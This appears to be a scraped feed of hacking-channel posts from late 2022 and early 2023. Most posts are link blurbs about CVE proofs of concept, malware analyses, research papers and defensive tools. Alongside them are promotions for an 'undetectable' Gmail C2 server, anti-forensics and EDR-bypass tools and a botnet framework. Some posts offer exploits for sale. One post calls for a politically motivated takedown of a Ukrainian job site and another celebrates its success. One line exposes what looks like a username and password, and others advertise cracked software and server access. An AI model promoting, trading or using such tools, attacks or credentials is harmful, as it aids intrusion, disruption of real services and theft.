Gmailc2: A Fully Undetectable C2 Server That Communicates Via Google SMTP to evade Antivirus Protections and Network Traffic Restrictions. C2 Feature: ▫️ Persistence (type persist) ▫️ Shell Access ▫️ System Info (type info) ▫️ More Features Will Be Added. Features: ▫️ FUD Ratio 0/40 ▫️ Bypass Any EDR's Solutions ▫️ Bypass Any Network Restrictions ▫️ Commands Are Being Sent in Base64 And Decoded on server side ▫️ No More Tcp Shits
2023-01-17 09:30:32
Class. Topic: Sql injection. Time: 8 Pm IST. Details: @vanshsec. Invite Link (Web) : se Jayada Aaye Aur thodi Si Aur knowledge paye
2023-01-17 02:16:06
2023-01-17 02:15:46
2023-01-16 10:24:51
2023-01-16 10:00:27
Forensia: Anti Forensics Tool For Red Teamers, Used For Erasing Footprints In The Post Exploitation Phase. #Unloading Sysmon Driver. #Gutmann Method File Shredding. #USNJrnl Disabler. #Prefetch Disabler. #Log Eraser and Event log Disabler. #User Assist Update Time Disabler. #Access Time Disabler. #Clear Recent Items #Clear Shim Cache #Clear RecentFileCache #Clear ShellBag #File Melting Capabilities.
2023-01-16 07:59:31
2023-01-16 07:59:30
2023-01-15 16:02:45
2023-01-15 13:05:50
#Research "TROJANPUZZLE: Covertly Poisoning Code-Suggestion Models", 2023.
2023-01-15 13:05:49
#Malware_analysis How to Analyze JavaScript Malware - A Case Study of Vjw0rm
2023-01-15 13:05:48
#exploit 1. CVE-2022-28944/CVE-2022-24644: EMCO Software Multiple Products/KeyMouse 3.08 (Win) - Unauth. Update RCE Client-Side SSRF to Google Cloud Project Takeover [Google VRP] CVE-2022-3656: Symbolic Link Following + Upload Warning Bypass
2023-01-15 13:05:47
#Infographics #Malware_analysis Antivirus Event Analysis Cheat Sheet, ver. 1.11.0.
2023-01-15 13:05:46
#tools #Blue_Team_Techniques 1. Detecting Fake Events in Azure Sign-in Logs Crassus - Windows privilege escalation discovery tool
2023-01-15 09:18:43
Cheatsheets of knowledge about information security.
2023-01-15 05:01:28
Happy Indian Army Day 💖
2023-01-15 03:51:00
Love you india ❤️❤️
2023-01-15 00:13:40
PTorZillaPrint: Firefox & Tor Browser fingerprint testing.
2023-01-14 15:16:55
2023-01-14 13:01:33
CVE-2022-46169: Exploit for the CVE-2022-46169 vulnerability in Cacti 1.2.19
2023-01-14 12:56:58
Asta-decrypt: This is a simple script that implements the decryption routine for the encrypted final stage used by the Astaroth/Guildma malware family. Astaroth uses an AutoIT script with an embedded DLL that writes the final payload to disk as db.temp and injects it into a hollow process.
2023-01-14 08:42:40
Happy Makar Sankranti to all of you❤️
2023-01-14 05:38:19
CVE-2023-21752: PoC for arbitrary file delete vulnerability in Windows Backup service
2023-01-14 01:07:44
2023-01-14 00:40:47
SUDO_KILLER: A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo for linux privilege escalation. #sudo
2023-01-13 20:37:47
Guys please support me
2023-01-13 13:55:41
#Whitepaper "EyeSpy - Iranian Spyware Delivered in VPN Installers", 2023.
2023-01-13 13:55:40
#Malware_analysis 1. NeedleDropper Analysis Gootkit Loader "Pre-Owned" malware in ROM on T95 Android TV Box (AllWinner H616)
2023-01-13 13:55:39
#exploit 1. PoC for arbitrary file delete/move in Razer Synapse 3 Macro module CVE-2023-21752: PoC for arbitrary file delete vulnerability in Windows Backup service
2023-01-13 09:59:33
2023-01-13 08:04:09
GraphQL exploitation – All you need to know – Cybervelia January 13, 2023 at 02:28AM by Necessary-Reality-80 via reddit
2023-01-13 08:04:08
Linux sysadmins, beware! Hackers are exploiting a critical RCE vulnerability in Control Web Panel (CWP) to gain elevated privileges on web servers. Read: your servers ASAP!
2023-01-13 03:56:10
Happy Lohri to everyone
2023-01-12 18:33:56
If u want organic traffic for ur site to promote to eligible for adds ping me @alex14324 escrows welcome 😊
2023-01-12 17:20:05
#reversing #IoT_Security Reversing embedded device bootloader (U-Boot) Part 1: 2:
2023-01-12 17:20:04
#tools #Malware_analysis #Blue_Team_Techniques Automating Malware Analysis Operations (MAOps) ]-> Malware C2 Monitoring: ]-> Malware Hunting using Cloud: ]-> YARA CI/CD system: ]-> Surface Analysis System on Cloud: ]-> Memory Forensic on Cloud:
2023-01-12 17:20:03
#exploit 1. CVE-2023-0210: Unauthenticated remote DOS in ksmbd NTLMv2 authentication (Linux kernel) CVE-2022-20452: Privilege escalation on Android from installed app to system/another app via LazyValue using Parcel after recycle()
2023-01-12 17:20:01
#Research "Apple vs. EMA: Electromagnetic Side Channel Attacks on Apple CoreCrypto", 2022. ]-> A Potholing Tour in a SoC: An electromagnetic-wave side-channel issue on ARMv8 AES instructions:
2023-01-12 17:20:00
#Threat_Research Open-source Cobalt Strike stager decoder
2023-01-12 17:19:59
#Offensive_security 1. SMB "Access is denied" caused by anti-NTLM relay protection Implementation of Persistence via Recycle Bin by adding "open\command" subkey to the "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell" key and changing its value to the implant path Vulnerabilities on redirected•com
2023-01-12 14:39:37
Please like and support it guys…!
2023-01-12 10:54:48
Secret Handshake: A prototype malware C2 channel using x509 certificates over mTLS. I always wondered if threat actors ever used x509 certificates as part of their C2 communication, not to encrypt the network traffic but to actually embed the C2 communication in the x509 cert. After searching for something like this in the wild for 5 years I finally decided to just code it myself to see if it's is
2023-01-12 05:51:59
SpyDialer: Free search contact information by phone number, name, address or email. Even shows the names of the neighbors, but the information displayed by the service requires additional verification. #humint #usa
2023-01-12 05:32:34
Exploit for CVE-2022-20452 privilege escalation on Android from installed app to system app (or another app) downLoad #android #exploit
2023-01-11 15:31:49
📡Coming very soon: the effective and safe AARTOS DDS system for detecting drones will be presented, with protection that is tailored individually to each customer. This marvel will be shown at the Perimeter Protection exhibition from 17 to 19 January 2023
2023-01-11 15:24:28
🕵️‍♂️StrongPity espionage campaign targeting Android users. ESET researchers identified an active campaign that we have attributed to the StrongPity APT group. Active since November 2021, the campaign has distributed a malicious app through a website impersonating Shagle – a random-video-chat service that provides encrypted communications between strangers. Unlike the entirely web-based, genuine Shagle site that doesn’t offer an official mobile app to access its services, the copycat site only provides an Android app to download and no web-based streaming is possible.
2023-01-11 15:17:16
#Threat_Research 1. RCE bug in JWT Secret Poisoning (CVE-2022-23529) Bring-Your-Own-Vulnerable-Driver Tactic in Attempt to Bypass Endpoint Security Navigating the Vast Ocean of Sandbox Evasions
2023-01-11 15:17:15
#Offensive_security 1. Microsoft LAPS(E) in Judgement NonHeavyFTP: A FTP Server pwn challenge
2023-01-11 15:17:14
#Research "BlockScope: Detecting and Investigating Propagated Vulnerabilities in Forked Blockchain Projects", 2022.
2023-01-11 15:17:13
#exploit 1. CVE-2022-31705: Geekpwn 2022 Vmware EHCI OOB Linux >=4.10: UAF in __do_semtimedop() due to lockless check outside RCU section Lexmark Printers/Copiers haxx 0-day Exploit
2023-01-11 15:17:12
#Fuzzing Fuzztruction - prototype of a fuzzer that does not directly mutate inputs but instead uses a so-called generator application to produce an input for our fuzzing target
2023-01-11 15:14:57
2023-01-11 15:14:56
2023-01-11 15:14:55
2023-01-11 08:59:41
2023-01-11 02:31:47
CVE-2022-39073: Proof of concept for the command injection vulnerability affecting the ZTE MF286R router, including an RCE exploit. #exploit
2023-01-11 02:31:46
ImageMagick Security Policy Evaluator January 10, 2023 at 04:52PM by nibblesec via reddit
2023-01-10 18:17:45
2023-01-10 16:31:12
My old video 5 years back tracing ip address
2023-01-10 15:44:50
Programmable NFC RFID Card, 4 930 rubles #Equipment
2023-01-10 15:35:52
⚙️ New Update On AlienFox Ultimate 🦊
2023-01-10 15:30:02
2023-01-10 15:18:46
Geolocation Spy (GeoSpy) - is an OSINT analysis and research tool that is used to track and execute intelligent social engineering attacks in real time.▫️
2023-01-10 13:19:07
#exploit SSRF attack on MySQL Server with password using php-curl
2023-01-10 13:19:06
#Red_Team_Tactics 1. Bypass EDR Hooks by patching NT API stub, and resolving SSNs and syscall instructions at runtime A new AMSI Bypass technique using .NET ALI Call Hooking Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID
2023-01-09 18:38:22
𝘾𝙍𝙔𝙋𝙏𝙊 𝙊𝙎𝙄𝙉𝙏:├BTC-ETH-XRP-BCH-LTC-XLM-DASH-ZEC-XMR-TON (Blockchain)├Google Dorks (Change Wallet)├blockchair (Explorer) + Chrome├breadcrumbs (Visualization) + Chrome├shard (Visualization)├blockpath (Visualization)├oxt (Visualization)├graphsense (Visualization)├ethtective (Visualization ETH)├walletexplorer (Grouping)├bitinfocharts (Grouping)├bitcoinabuse (Abuse)├bitcoinwhoswho (Abuse)├checkbitcoinaddress (Abuse)├scamalert (Abuse)├cryptscam (Abuse)├ransomwhe (Abuse)├badbitcoin (Abuse)├bitcoinais (Abuse)├cryptoblacklist (Abuse)├bitrankverified (Scoring)├vivigle (Scoring)├antinalysis (Scoring TOR)├cryptocurrencyalerting (Monitoring)├cryptotxalert (Monitoring)├kycp (Block Analysis)├blockstream (Block Analysis)├fragment (TON market)└btcrecover (Wallet Brute)
2023-01-09 17:41:18
We're gorgeous👄 Nice work💯 And the pigs, as always, are heading ⚰🏃‍♂️🏃‍♂️🏃‍♂️🏃‍♂️🏃‍♂️🏃‍♂️👍
2023-01-09 17:41:17
📌Good evening, CyberArmy⚔🇷🇺 We are trying to take down a Ukrainian pig-service for job searching that calls for creating call centres to phone Russian state institutions in order to report false information about them being mined! URL:❓IP:❓ Starting⚠️
2023-01-09 17:34:11
2023-01-09 16:40:34
The site of the point was cyber-crashed😏👍
2023-01-09 11:37:43
2023-01-08 15:48:10
Wordpress exploit come with your price @alex14324
2023-01-08 13:03:13
2023-01-08 10:11:11
Leaked FBI Operating System that is used by a certain division known as the Computer Analysis Response Team (CART)
2023-01-08 03:56:02
2023-01-07 16:38:12 IS BACK :)❤️
2023-01-07 15:06:59
#tools #Offensive_security 1. Alcatraz - x64 binary obfuscator Phantom DLL Hollower
2023-01-07 15:04:22
💥Phantom DLL Hollower is a PoC that performs Phantom DLL Hollowing, which was reported by @_forrestorr. 🔖Masking Malicious Memory Artifacts – Part I: Phantom DLL Hollowing ⚙️Phantom DLL hollowing PoC
2023-01-07 14:06:21
2023-01-06 19:38:50
Let me know if anybody is interested to purchase; price is negotiable. DM @alex14324
2023-01-06 16:43:11
Cyber Security Attack Vectors👁 #Attack
2023-01-06 16:16:10
#Research "From IP to Transport and Beyond: Cross-Layer Attacks Against Applications", 2022.
2023-01-06 16:16:09
#Threat_Research 1. Prototype Pollution in Python Pre-Auth RCE in Liferay Portal CE (CVE-2019-16891)
2023-01-06 16:16:08
#Analytics #Infographics Systematization of attacks on the perimeter of L2/L3 network equipment. Ver. 3.0.
2023-01-06 15:55:17
2023-01-06 15:21:53
Account Takeover Using Password Reset by Unknown
2023-01-06 13:46:01 pack of osint
2023-01-06 12:37:15
2023-01-06 07:37:36
2023-01-06 07:37:16
2023-01-05 17:29:00
2023-01-05 17:23:46
🔹 Useful Websites 🔹 1. Digital Library - Archive.org 2. Online Courses - w3schools.com 3. Screenshot Taker (Permanent) - Archive.is 4. Learn Languages - Duolingo.com 5. Screenshot Taker (HD) - Screenshot.guru 6. Bypass Login (Websites) - Bugmenot.com 7. Graphic Softwares - Vectr.com 8. Cracked Softwares - CrackingPatching.com 9. File Sharing (2GB) - wetransfer.com 10. Autodraw (A.I) -
2023-01-05 14:08:22
#Research #cryptography "Factoring integers with sublinear resources on a superconducting quantum processor", Dec. 2022.
2023-01-05 14:08:21
#Tech_book "Security Strategies in Linux Platforms and Applications. Third Edition", 2022.
2023-01-05 14:08:20
#Whitepaper API Security Best Practices Guide: Comprehensive list of security best practices to secure your APIs throughout their lifecycle + API Security Checklist ]-> APIKit: Discovery, Scan and Audit APIs Toolkit:
2023-01-05 14:08:19
#Research #Threat_Research "Open-CyKG: An Open Cyber Threat Intelligence Knowledge Graph", 2021.
2023-01-05 14:08:18
#Research "Experience Report on the Challenges and Opportunities in Securing Smartphones Against Zero-Click Attacks", 2022.
2023-01-05 14:07:55
#DFIR New Windows 11 Pro (22H2) Evidence of Execution Artifact
2023-01-05 14:07:54
#Threat_Research #Red_Team_Tactics "Autonomous Penetration Testing using Reinforcement Learning" ]-> Network Attack Simulator:
2023-01-05 14:07:53
#Research "EarSpy: Spying Caller Speech and Identity through Tiny Vibrations of Smartphone Ear Speakers", 2022.
2023-01-05 14:07:52
#Offensive_security 1. Google Hacking Database (GHDB) NTP Fingerprinting Powershell scripts for post exploitation
2023-01-05 14:07:51
#Sec_code_review OWASP Mobile Application Security Testing Guide (MASTG)
2023-01-05 14:07:50
#exploit #reversing 1. Vulnerability in Synology NAS Reverse Engineering and Exploiting an IoT TotoLink N100RE bug ESI Injection PoCs
2023-01-05 14:07:49
#Malware_analysis 1. The Mac Malware of 2022 New version of Raspberry Robin
2023-01-05 14:07:48
#exploit 1. Buffer overflow exploit for Stephen Bradshaw's Vulnserver CVE-2022-20951: Cisco BroadWorks CommPilot Application Software Unauthenticated SSRF CVE-2022-20958: Cisco BroadWorks CommPilot Application Software Authenticated RCE
2023-01-05 11:19:00
2023-01-05 10:55:14
2023-01-05 06:25:29
2023-01-05 06:25:28
2023-01-04 16:06:49
🔥🔥🔥Indirect syscalls PoCs: 💥HellsHall (combination of HellsGate and indirect syscalls) - Another Way To Fetch Clean Syscalls 🔖Github repo 💥C_SYSCALLS is a single stub direct and indirect syscalling with runtime SSN resolving for windows. 💥Hiding Your Syscalls - bypassing detections that I wrote myself. To the best of my knowledge EDR vendors aren’t really alerting on direct syscalls yet. 🔖Source code 💥FreshyCalls tries to make the use of syscalls comfortable and simple, without generating too much boilerplate and in modern C++! Doesn't it bother you to have to define every syscall stub or function within a module? Or having to depend on the Windows version for the syscalls? Well, forget about all that. FreshyCalls makes use of some features implemented from C++11 such as the variadic templates along with some custom mini-shellcode to avoid this. 💥syscalls-asm 💥Charon's Ferry (adapted from HellsGate) - An indirect syscaller
2023-01-04 16:06:48
🌐Top 10 web hacking techniques of 2022
2023-01-04 13:10:23
2023-01-04 12:12:16
2023-01-04 04:55:10
PyBotNet: A #Python framework for building remote control, #botnet, #trojan or #backdoor with Telegram or other control panels
2023-01-04 02:36:24
2023-01-04 01:24:20
2023-01-03 16:37:26
2023-01-03 12:11:12
2023-01-03 06:49:31
Welcoming Our Forum »» https://system32.ink ASK: Anything Related To Tech With Create your Own forum. Learn: About Programming, cybersecurity, bugHunting And Many More. Post: Share your Knowledge, Rats, Databases And Videos related to Tech. So SignUp Now And Grow Our Community. Thank You;
2023-01-03 06:03:07
Fresh Onions http://freshonifyfe4rmuh6qwpsexfhdrww7wnt5qmkoertwxmcuvm4woo4ad.onion/
2023-01-03 06:03:06
Hacking tools pack & backdoors generator Interface lockscreen, Metasploit and More Android/IOS Hacking Socks4/5 or http proxies to make a multithreading Http-flood/Https-flood (cc) attack
2023-01-03 03:10:00
2023-01-02 18:27:41
🔥🔥🔥Survey of security mitigations and architectures, December 2022 "This blogpost summarizes and compares some of the exciting approaches in our journey to memory safety. I hope this could become a reference to interested readers and colleagues. Along this blogpost I’ll consider five security properties: spatial safety, temporal safety, type safety, definite initialization and concurrency safety."
2023-01-02 18:27:39
Thank you very much for reading me ❤️ Here is an article about reverse firmware in English:
2023-01-02 18:24:06
#Infographics #Malware_analysis Ransomware & Data Extortion Landscape in 2022
2023-01-02 18:24:05
#Threat_Research CVE-2022-27510, CVE-2022-27518 - Measuring Citrix ADC & Gateway version adoption on the Internet
2023-01-02 18:24:04
#tools #Blue_Team_Techniques 1. HTML Smuggling Detection - HTML Smuggling Detection Log4Shell-Scanner-Exploit - Bash script to identify the Log4j CVE-2021-44228 vulnerability remotely
2023-01-02 15:57:49
2023-01-02 14:30:25
2023-01-02 03:28:20
2023-01-01 16:02:37
2023-01-01 15:05:12
Welcoming Our Forum »» https://system32.ink ASK: Anything Related To Tech With Create your Own forum. Learn: About Programming, cybersecurity, bugHunting And Many More. Post: Share your Knowledge, Rats, Databases And Videos related to Tech. So SignUp Now And Grow Our Community. Thank You;
2023-01-01 14:48:22
2022-12-31 16:40:29
2022-12-30 18:15:45
EarSpy – A New Attack on Android Devices Use Motion Sensors to Steal Sensitive Data
2022-12-30 18:12:58
My diploma thesis on the security of dynamic routing, which I defended with top marks this year (I was finishing college, that is). Enjoy.
2022-12-30 16:39:49
🧰RedTeam-Tools is a github repository that contains a collection of tools and resources that can be useful for red teaming activities. ⚙️Reconnaissance ⚙️Resource Development ⚙️Initial Access ⚙️Execution ⚙️Persistence ⚙️Privilege Escalation ⚙️Defense Evasion ⚙️Credential Access ⚙️Discovery ⚙️Lateral Movement ⚙️Collection ⚙️C&C ⚙️Exfiltration ⚙️Impact
2022-12-30 16:26:31
#hardening Windows 10 Hardening (v.0.9.0) settings and configurations
2022-12-30 16:26:30
#reversing 1. Reverse Engineering Rustlang Binaries - A Series Huawei's Security Hypervisor
2022-12-30 16:26:29
#Malware_analysis 1. GuLoader Malware Uses Advanced Anti-Analysis Techniques to Evade Detection CatB Ransomware
2022-12-30 16:26:28
#Threat_Research Supply-Chain Security: Evaluation of Threats and Mitigations
2022-12-30 16:26:27
#Research #Sec_code_review "Do Users Write More Insecure Code with AI Assistants?", 2022.
2022-12-30 16:26:26
#Cloud_Security 1. Parsing and manipulating JSON in Powershell Passwordless Persistence and Privilege Escalation in Azure
2022-12-30 15:18:22
must watch once video by @Deadlymalwarexp💻@Deadlymalwarexp💻
2022-12-30 14:42:22
2022-12-30 14:17:12
In the third quarter of this year, the Russians withdrew a record 1.47 trillion rubles to other countries. This is almost three times more than in the first and second quarters, and 26 times more than in the third quarter of 2021.
2022-12-29 15:30:52
2022-12-29 11:37:02
Free WHM 🔟✔️
2022-12-29 11:37:01
#𝑆𝑀𝑇𝑃𝑆 🟢🔥
2022-12-28 16:20:03
#Research "A Survey of the Recent Trends in Deep Learning Based Malware Detection", 2022.
2022-12-28 16:20:02
#reversing L’art de l’évasion: How Shlayer hides its configuration inside Apple proprietary DMG files
2022-12-28 16:20:01
#Malware_analysis 1. BlueNoroff introduces new methods bypassing MoTW GuLoader Dissection Reveals New Anti-Analysis Techniques and Code Injection Redundancy
2022-12-28 16:20:00
#tools #Offensive_security Steganography Toolkit
2022-12-28 16:19:59
#tools #reversing 1. OFRAK (Open Firmware Reverse Analysis Konsole) - binary analysis and modification platform A free comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM & 64-bit ARM architectures
2022-12-28 16:19:58
#Offensive_security Modifying Embedded Filesystems in ARM Linux zImages
2022-12-28 16:19:57
#Red_Team_Tactics 1. Divide And Bypass: A new Simple Way to Bypass AMSI Pass-the-Challenge: Defeating Windows Defender Credential Guard
2022-12-28 16:19:56
#exploit KITCTFCTF 2022 V8 Heap Sandbox Escape ]-> PoC:
2022-12-28 16:19:55
#tools #Blue_Team_Techniques 1. Potential Cloud Account Takeover Kernel-mode WinDbg extension for Protected Process investigation
2022-12-28 14:33:15
2022-12-28 14:00:42
Certificate Ripper v2 released - tool to extract server certificates December 28, 2022 at 06:24AM by Hakky54 via reddit
2022-12-28 14:00:41
Spice up your persistence: loading PHP extensions from memory December 28, 2022 at 03:25AM by gid0rah via reddit
2022-12-27 17:08:21
DSTIKE WiFI Deauther MiNi: Deauther MiNi is still an ESP8266 development board. It comes installed with the latest ESP8266 Deauther software. With this software, you can perform different attacks to test WiFi networks. Please note that the ESP8266 does only support 2.4GHz. You can also use it to develop your own software. It is simple to use, just like any other ESP8266 development board. Function: ▫️ Deauther Attack: Disconnect 2.4G WiFi ▫️ Deauther Beacon: Create fake networks ▫️ Deauther Probe: Confuse wifi trackers ▫️ Packet Monitor: Display wifi traffic. Deauther or Jammer: What's the difference? Buy online: 🛒 #dstike #esp8266
2022-12-27 14:57:04
2022-12-26 14:29:19
🔥🔥🔥Cinema time! Agenda: 💾Video decoding subsystem overview 💾AppleAVD internals 💾AppleAVD attack surface 💾Fuzzing approach and code analysis 💾Results 💾Previously disclosed vulnerabilities and exploitation 💾Discussion 💾Q&A
2022-12-26 14:28:43
🔥🔥🔥KITCTFCTF 2022 V8 Heap SBX (V8 exploitation challenge). In this writeup, I’ll go over the intended solution in detail which leads to a V8 (heap) sandbox escape without using the JIT technique that is very popular currently.
2022-12-26 14:28:39
💥Introduction to the Windows Filtering Platform. The Windows Filtering Platform (WFP) provides flexible ways to control network filtering. It exposes user-mode and kernel-mode APIs, that interact with several layers of the networking stack. Some configuration and control is available directly from user-mode, without requiring any kernel-mode code (although it does require administrator-level access). WFP replaces older network filtering technologies, such as Transport Driver Interface (TDI) filters and some types of NDIS filters.
2022-12-26 14:28:33
🔥🔥🔥AD manager Plus full RCE PoC. At that time, Log4j was already widespread on the internet. Manage Engine had already patched the Ad Manager Plus to prevent it from being affected by the Log4j vulnerability. They had mentioned that Log4j was not affected by Ad Manager Plus. However, we determined that the Ad Manager Plus was running on our target and managed to exploit the Log4j vulnerability. When we initially reported this vulnerability to Synack, we only managed to get a DNS callback and our report was marked as LDAP injection. However, we attempted to gain full RCE on the host but were not successful. Later, we discovered that Ad Manager Plus was running on another target, so we tried to get full RCE on that target. We realized that there was a firewall and an anti-virus running on the machine, so most of our payloads wouldn't work. After spending a considerable amount of time, we eventually managed to bypass the firewall and anti-virus, and achieve full RCE.
2022-12-26 14:28:26
|The Apocalypse of the Heap - Shizo edit.| 💥Painless intro to the Linux userland heap. The heap is hard to maintain, especially in this implementation due to being threaded. Hopefully this article helps you understand the process of making a chunk free from its allocation and which structures play in the game of freeing chunks. 💥Understanding glibc malloc 💾How heap memory is obtained from kernel? 💾How efficiently memory is managed? 💾Is it managed by kernel or by library or by application itself? 💾Can heap memory be exploited? 💥ptmalloc fanzine episodes (collection of resources related to glibc heap meta-data corruptions): 💾episode 01: munmap madness 💾episode 02: fastbin fever 💾episode 03: scraps of notes on ptmalloc metadata corruptions 💾episode 04: once upon a realloc() 💾episode 05: thread local caching in glibc malloc 💥Heap exploitation for Dummies. This short book is written for people who want to understand the internals of 'heap memory', particularly the implementation of glibc's 'malloc' and 'free' procedures, and also for security researchers who want to get started in the field of heap exploitation. 🔖github repo 💥Educational Heap Exploitation (how2heap) is for learning various heap exploitation techniques. We use Ubuntu's Libc releases as the gold-standard. Each technique is verified to work on corresponding Ubuntu releases. 💥GlibC Malloc for Exploiters presentation 💥Linux Heap Exploitation Intro Series: 💾printf might be leaking! 💾Used and Abused – Use After Free 💾The magicians cape – 1 Byte Overflow 💾Riding free on the heap – Double free attacks! 💾Set you free() – part 1 💾Set you free() – part 2 💥How to exploit a double free vulnerability in 2021 (Exploiting an ARM-only race condition). You will learn how to exploit a double free vulnerability or exploit a UAF vulnerability. 💥Linux kernel heap feng shui in 2022. In this article we discuss changes in the Linux kernel slab allocator implementation and exploitation challenges associated with kernel heap-related vulnerabilities. We focus on the SLUB (unqueued slab allocator) implementation in this article since it is the most common allocator enabled by default on most Linux distributions and Android devices. 💥Overview of GLIBC heap exploitation techniques. Overview of current GLIBC heap exploitation techniques up to GLIBC 2.34, including their ideas and introduced mitigations along the way. 💥Perfect Spray: A Journey From Finding a New Type of Logical Flaw at Linux Kernel To Developing a New Heap Exploitation Technique. In this talk, we will present Pspray, a new memory exploitation technique for the Linux kernel, dramatically improving the exploitation reliability. In particular, we designed a heap exploitation technique effective for most memory vulnerabilities, including heap OOB, UAF, and double-free. The key idea behind this new attack is in developing timing side-channels in Linux's SLUB allocator. Then using this timing side-channel, we carefully redesigned the traditional exploitation technique to precisely predict the runtime behavior of SLUB, allowing Pspray to avoid unexpected exploitation failure. We used Pspray's exploitation technique for 10 real-world Linux kernel vulnerabilities, which significantly improved the attack success probability from 56.1% to 97.92%.
2022-12-26 14:28:22
⬇️Below is a short list of materials that helped me in studying the heap exploitation ⬇️
2022-12-26 14:13:25
2022-12-26 05:05:46
dnscrypt-proxy: A flexible DNS proxy, with support for modern encrypted DNS protocols such as DNSCrypt v2, DNS-over-HTTPS, Anonymized DNSCrypt and ODoH (Oblivious DoH). ▫️ dnscrypt-proxy documentation ← Start here ▫️ DNSCrypt project home page ▫️ Discussions ▫️ DNS-over-HTTPS and DNSCrypt resolvers ▫️ Server and client implementations ▫️ DNS stamps ▫️ FAQ #privacy
2022-12-26 05:05:45
Overview of Glibc Heap Exploitation Techniques (currently up to v2.34) December 25, 2022 at 10:17AM by himeko98 via reddit
2022-12-25 15:35:37
Hello everyone, on this auspicious day we are going to launch our Forum powered by @H4ckerinthehouse where you can connect, share and communicate with each other. Here are some features of this forum: You can ask questions, create polls, answer any question. You can refer anyone using your referral code. You can make a public discussion group as well as a private discussion group! Also you can send a private message to an individual and you can ask anything. A lot of upcoming features and surprises are coming in upcoming days. So what are you guys looking for? Go and register on the Hackerinthehouse Forum. Here is the link of the forum to register:
2022-12-25 14:04:03
2022-12-25 01:44:59
Happy Tulsi Pujan ❤️
2022-12-24 16:39:20
#reversing Reverse Engineering Tiktok's VM Obfuscation
2022-12-24 16:39:19
#Malware_analysis 1. Zerobot Malware IcedID Botnet Distributors Abuse Google PPC to Distribute Malware
2022-12-24 16:39:18
#Blue_Team_Techniques 1. Linux kernel module generator for Hidden firewall that follows the rules in the external YAML file Guide to Use Sigma EVTX Checker Fast go-based scanner for Linux, Windows, macOS that applies Sigma rules and outputs the matches as JSON
2022-12-24 16:39:17
#exploit 1. CVE-2020-9854: "Unauthd" - three logic bugs ftw CVE-2022-3875, CVE-2022-3876, CVE-2022-3877: Vulnerabilities in Passwordstate
2022-12-24 16:39:16
#tools #Offensive_security 1. Rps_Http ClientInfo IOC search PowerShell script for recent Exchange issue to check for signs of exploitation Vultriever - Vulnerability scoring with Nmap with the built-in Vulners snap-in
2022-12-24 16:39:15
#Threat_Research 1. Custom-Branded Ransomware: The Vice Society Group and the Threat of Outsourced Development New Ransomware Strains Emerging From Leaked Conti’s Source Code
2022-12-24 16:38:17
🔥🔥🔥PoC of wfshbr64.sys LPE (Windows Kernel Mode Anti-Cheat Driver, CVE-2022-42046). wfshbr64.sys and wfshbr32.sys specially crafted payload allows arbitrary user to perform bitwise operation with arbitrary EPROCESS offset and flags value to purposely elevate the game process to CodeGen Full protection by manipulating EPROCESS.Protection and EPROCESS.SignatureLevel flags (security hole as a feature). ⚠️The driver is signed by Microsoft hardware compatibility publisher that is submitted via Microsoft Hardware Program.
2022-12-24 16:38:16
🔥🔥🔥Blindside is a technique for evading the monitoring of EDR and XDR platforms using hardware breakpoints to inject commands and perform unexpected, unwanted, or malicious operations. It involves creating a breakpoint handler, and setting a hardware breakpoint that will force the debugged process to load only ntdll to memory. This will result in a clean and unhooked ntdll which then could be copied to our process and unhook the original ntdll. 🔖Technical blog post: Blindside: A New Technique for EDR Evasion with Hardware Breakpoints
2022-12-24 16:38:15
💥Reverse Engineering Tiktok's VM Obfuscation (Part 1). This article does not delve into the specifics of how these strings are utilized or how TikTok interprets the rest of the bytecode through its custom virtual machine and various opcodes. If that is something you are interested in, keep an eye out for the second part of this series. 🔖Full strings dump
2022-12-24 16:12:27
2022-12-24 10:30:35
2022-12-24 10:11:58
2022-12-24 09:59:36
»»»» ««««UserName: tac-userPassword: ~D4p5o8s
2022-12-23 14:56:02
Hello, my rabbits who like to go to tea parties 🐰☕️
While I am writing about bitcoin nodes search and analysis, I decided to make a collection of rootkit malware on linux🐧
Reverse💊
- Not really about linux, but still a very cool guide to reverse;
- Article about reverse-engineering the Ebpfkit rootkit;
- Article about dovecat and hy4 malware analysis for Linux;
- A collection of resources for reverse-engineering Linux;
- Article about virus analysis automation on linux;
- Article about malware analysis for Linux;
- Article about rootkit and its detection;
Resources🗝
- A site with material on viruses and rootkits on linux, including their writing;
- A site with resources on reversal;
- A resource site for people who want to write viruses for linux;
- A site with excellent material and documents about linux malware;
Examples of malware 🦠
- A github thread with cool virus repositories;
- Linux X86_64 ELF virus;
- A simple linux virus. It can get root rights and destroy your system;
- Linux ransomware;
- Repository of the source code of various Linux malware;
- Combination of shell and rootkit;
- Collection of Linux rootkits;
- A simple Linux kernel rootkit;
Materials / Collections📖
- A collection of linux virus materials;
- A collection of materials on rootkits and attacks on linux;
- Article about evading malware analysis by reverse engineering;
- Malware analysis methodology in Linux environment;
- An article for understanding Linux malware;
- Not a bad article about writing rootkits on linux;
Malware Scanners 🧲
- LMD malware scanner for Linux;
- Linux rootkit scanner;
- A github thread with collections of Linux rootkit scanners;
- Also a good rootkit scanner;
As you can see, although it is widely accepted that "writing viruses on linux is difficult, or even impossible practice", it is far from it, and that you have linux is not yet a silver bullet against viruses. On linux, viruses (especially rootkits) are written and very successfully. So take care and protect your system.
Thank you for reading ❤️
And Alice, don't forget to read the sign on the back of the bottle you want to drink, in case it says "poison"🧪🎀
#malware #virus #revers #ransomware #attacks #linux #exploit #rootkit
2022-12-23 14:52:41
🔥🔥🔥The GOAD’s writeups series end with this part.
💥GOAD - part 12 - Trusts
This post will be on escalation with domain trust (from child to parent domain) and on Forest to Forest trust lateral move.
2022-12-23 14:33:14
2022-12-22 16:05:24
Hacking & Cybersecurity class materials
We are delighted to announce a first on Lawfare: A live online class on hacking and cybersecurity.
2022-12-22 16:05:23
USB Ninja
USB Ninja is an information security and penetration testing tool that looks and functions just like a regular USB cable (both power and data) until a wireless remote control triggers it to deliver your choice of attack payload to the host machine. In essence, USB Ninja is the next step in the evolution of BadUSB, embedding the attack in the USB cable itself.
Emulating keyboard and mouse actions, payloads can be completely customized and can be highly targeted. Undetectable by firewalls, AV software (depending on payload of course) or visual inspection, the USB Ninja is an ideal tool for penetration testers, police and government.
Wireless trigger device for the USB Ninja. Can trigger two different payloads via toggle buttons. Accepts RP-SMA antennas if you want greater distances for remote payload triggering.
Documentation: online: 🛒 Cable 🛒 Bluetooth Remote
#badusb #cable
2022-12-22 16:02:36
Golden Nuggets
